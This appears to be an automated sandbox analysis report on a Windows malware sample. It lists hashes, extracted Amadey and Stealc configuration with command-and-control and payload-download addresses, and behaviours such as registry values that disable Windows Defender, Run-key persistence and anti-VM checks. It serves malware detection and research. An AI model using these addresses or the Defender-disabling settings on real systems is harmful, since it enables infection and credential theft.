Analysis
-
max time kernel
148s -
max time network
149s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
26/03/2025, 05:04
Static task
static1
Behavioral task
behavioral1
Sample
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
Resource
win10v2004-20250314-en
General
-
Target
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe
-
Size
1.8MB
-
MD5
442fc32065555d167806a2a766454b88
-
SHA1
10882938da5aed6fe9e2d7df16919aca6e849eff
-
SHA256
61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9
-
SHA512
c19e959174d1e266302d782ffb43ffdd891387c4121fa5949f20b6e7d932326f76a972c0bb55cdb4cf51bb49987cd69426100e745f20def59d90fa73add80fe7
-
SSDEEP
49152:TnkrXn/GImQqXv0k14QUpvyXW+rKKM2F0luHM4iON6I3sd1:TnkTn/Gqq/B17uvV+PMQMuse
Malware Config
Extracted
http://176.113.115.7/mine/random.exe
Extracted
http://176.113.115.7/mine/random.exe
Extracted
amadey
5.21
092155
http://176.113.115.6
-
install_dir
bb556cff4a
-
install_file
rapes.exe
-
strings_key
a131b127e996a898cd19ffb2d92e481b
-
url_paths
/Ni9kiput/index.php
Extracted
stealc
trump
http://45.93.20.28
-
url_path
/85a1cacf11314eb8.php
Signatures
-
Amadey family
-
Detects Healer an antivirus disabler dropper 3 IoCs
resource yara_rule behavioral1/memory/2100-1008-0x0000000000E20000-0x000000000129E000-memory.dmp healer behavioral1/memory/2100-1009-0x0000000000E20000-0x000000000129E000-memory.dmp healer behavioral1/memory/2100-1631-0x0000000000E20000-0x000000000129E000-memory.dmp healer -
Gcleaner family
-
Healer family
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\DisableAntiSpyware = "1" d9365fab09.exe -
Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection d9365fab09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" d9365fab09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" d9365fab09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" d9365fab09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" d9365fab09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" d9365fab09.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" d9365fab09.exe -
Modifies Windows Defender notification settings 3 TTPs 2 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications\DisableNotifications = "1" d9365fab09.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications d9365fab09.exe -
Stealc family
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 86fe7fa314.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ d9365fab09.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ a1d4ceb986.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ rapes.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ e701a6ea58.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ 3f471eadc8.exe -
Blocklisted process makes network request 2 IoCs
flow pid Process 9 1900 powershell.exe 12 1488 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs
Run Powershell and hide display window.
pid Process 1900 powershell.exe 1488 powershell.exe 2140 powershell.exe 1236 powershell.exe 1016 powershell.exe -
Creates new service(s) 2 TTPs
-
Downloads MZ/PE file 13 IoCs
flow pid Process 5 2844 rapes.exe 6 2844 rapes.exe 7 2844 rapes.exe 7 2844 rapes.exe 104 2844 rapes.exe 104 2844 rapes.exe 141 3704 svchost015.exe 142 2548 svchost015.exe 9 1900 powershell.exe 12 1488 powershell.exe 15 2844 rapes.exe 15 2844 rapes.exe 15 2844 rapes.exe -
Possible privilege escalation attempt 2 IoCs
pid Process 3044 takeown.exe 3068 icacls.exe -
Stops running service(s) 4 TTPs
-
Checks BIOS information in registry 2 TTPs 18 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion e701a6ea58.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion e701a6ea58.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion d9365fab09.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion a1d4ceb986.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 86fe7fa314.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion a1d4ceb986.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rapes.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 86fe7fa314.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3f471eadc8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3f471eadc8.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 483d2fa8a0d53818306efeb32d3.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion d9365fab09.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion rapes.exe -
Executes dropped EXE 23 IoCs
pid Process 2844 rapes.exe 1120 apple.exe 2696 11.exe 1664 11.exe 1712 f73ae_003.exe 588 7IIl2eE.exe 1616 Passwords.com 2836 8bd4910853.exe 2960 Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE 2760 d9962a0c25.exe 880 483d2fa8a0d53818306efeb32d3.exe 3008 e701a6ea58.exe 3052 86fe7fa314.exe 1792 34db9b46bd.exe 2100 d9365fab09.exe 1592 f73ae_003.exe 2708 7IIl2eE.exe 3212 Passwords.com 3552 3f471eadc8.exe 3704 svchost015.exe 1716 a1d4ceb986.exe 2548 svchost015.exe 3228 99170ea781.exe -
Identifies Wine through registry keys 2 TTPs 9 IoCs
Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 86fe7fa314.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine d9365fab09.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine rapes.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 3f471eadc8.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine a1d4ceb986.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine 483d2fa8a0d53818306efeb32d3.exe Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Wine e701a6ea58.exe -
Loads dropped DLL 42 IoCs
pid Process 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 2844 rapes.exe 1120 apple.exe 1120 apple.exe 1120 apple.exe 1120 apple.exe 2844 rapes.exe 2844 rapes.exe 588 7IIl2eE.exe 2824 CMD.exe 2844 rapes.exe 1900 powershell.exe 2844 rapes.exe 2844 rapes.exe 2328 WerFault.exe 2328 WerFault.exe 2328 WerFault.exe 2328 WerFault.exe 1488 powershell.exe 2844 rapes.exe 2844 rapes.exe 2844 rapes.exe 2844 rapes.exe 2844 rapes.exe 2844 rapes.exe 2844 rapes.exe 2844 rapes.exe 2844 rapes.exe 2708 7IIl2eE.exe 276 CMD.exe 2844 rapes.exe 2844 rapes.exe 3552 3f471eadc8.exe 2844 rapes.exe 2844 rapes.exe 1716 a1d4ceb986.exe 2844 rapes.exe 2844 rapes.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe 3264 WerFault.exe -
Modifies file permissions 1 TTPs 2 IoCs
pid Process 3044 takeown.exe 3068 icacls.exe -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Windows security modification 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features d9365fab09.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" d9365fab09.exe -
Adds Run key to start application 2 TTPs 6 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\8bd4910853.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338040101\\8bd4910853.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\am_no.cmd = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338050121\\am_no.cmd" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\e701a6ea58.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338170101\\e701a6ea58.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\86fe7fa314.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338180101\\86fe7fa314.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\34db9b46bd.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338190101\\34db9b46bd.exe" rapes.exe Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Windows\CurrentVersion\Run\d9365fab09.exe = "C:\\Users\\Admin\\AppData\\Local\\Temp\\10338200101\\d9365fab09.exe" rapes.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
AutoIT Executable 2 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000600000001a42d-701.dat autoit_exe behavioral1/files/0x000500000001a4d3-835.dat autoit_exe -
Enumerates processes with tasklist 1 TTPs 4 IoCs
pid Process 3888 tasklist.exe 2332 tasklist.exe 1236 tasklist.exe 3764 tasklist.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 9 IoCs
pid Process 1440 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe 2844 rapes.exe 2960 Temp4VXWK9F8MQQTV7HVKXY9QRO69CDBKG7U.EXE 880 483d2fa8a0d53818306efeb32d3.exe 3008 e701a6ea58.exe 3052 86fe7fa314.exe 2100 d9365fab09.exe 3552 3f471eadc8.exe 1716 a1d4ceb986.exe -
Suspicious use of SetThreadContext 2 IoCs
description pid Process procid_target PID 3552 set thread context of 3704 3552 3f471eadc8.exe 181 PID 1716 set thread context of 2548 1716 a1d4ceb986.exe 183 -
Drops file in Program Files directory 46 IoCs
description ioc Process File opened for modification C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpEvMsg.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MSASCui.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCommu.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpRTP.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpCom.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MsMpRes.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MsMpLics.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\it-IT\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\es-ES\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\fr-FR\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\de-DE\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\fr-FR\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\ja-JP\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpOAV.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\de-DE\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpAsDesc.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\ja-JP\MpEvMsg.dll.mui cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files (x86)\Windows Defender\MpClient.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\it-IT\MsMpRes.dll.mui cmd.exe File opened for modification C:\Program Files\Windows Defender\MpAsDesc.dll cmd.exe File opened for modification C:\Program Files\Windows Defender\MpCmdRun.exe cmd.exe File opened for modification C:\Program Files\Windows Defender\MpSvc.dll cmd.exe -
Drops file in Windows directory 27 IoCs
description ioc Process File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe File opened for modification C:\Windows\LogisticsNotre 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\EstateLegislative 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\CorrectionsGeographic 7IIl2eE.exe File opened for modification C:\Windows\JenniferSubdivision 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\EnglandDeleted 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File created C:\Windows\Tasks\rapes.job 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\PotteryUser 7IIl2eE.exe File opened for modification C:\Windows\SpecificsHeaven 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\WallpapersHo 7IIl2eE.exe File opened for modification C:\Windows\RowTopics 7IIl2eE.exe File opened for modification C:\Windows\ProvidingMilwaukee 7IIl2eE.exe File opened for modification C:\Windows\DiscussedFacial 7IIl2eE.exe File opened for modification C:\Windows\BrandonStat 7IIl2eE.exe File opened for modification C:\Windows\GentleLogging 7IIl2eE.exe -
Launches sc.exe 38 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 108 sc.exe 1560 sc.exe 1824 sc.exe 2708 sc.exe 984 sc.exe 2312 sc.exe 1436 sc.exe 2848 sc.exe 448 sc.exe 1980 sc.exe 1504 sc.exe 1992 sc.exe 3064 sc.exe 2076 sc.exe 2424 sc.exe 2552 sc.exe 544 sc.exe 2020 sc.exe 1660 sc.exe 2160 sc.exe 2664 sc.exe 3036 sc.exe 1088 sc.exe 1016 sc.exe 2060 sc.exe 2240 sc.exe 952 sc.exe 1176 sc.exe 236 sc.exe 1568 sc.exe 2580 sc.exe 3056 sc.exe 2484 sc.exe 1448 sc.exe 1960 sc.exe 1716 sc.exe 988 sc.exe 1596 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 3f471eadc8.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language timeout.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 34db9b46bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language d9365fab09.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language a1d4ceb986.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 11.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Passwords.com Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tasklist.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language 34db9b46bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 7IIl2eE.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language apple.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language svchost015.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language f73ae_003.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language e701a6ea58.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 61260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rapes.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 86fe7fa314.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CMD.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language extrac32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language choice.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\Nls\Language\InstallLanguage 34db9b46bd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 8bd4910853.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language findstr.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz firefox.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier firefox.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 firefox.exe -
Delays execution with timeout.exe 2 IoCs
pid Process 1984 timeout.exe 2536 timeout.exe -
Kills process with taskkill 5 IoCs
pid Process 1768 taskkill.exe 1572 taskkill.exe 1544 taskkill.exe 588 taskkill.exe 1652 taskkill.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Modifies registry class 1 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000_Classes\Local Settings firefox.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2312 schtasks.exe 1828 schtasks.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
pid Process 1664 11.exe -
Suspicious behavior: EnumeratesProcesses 40 IoCs
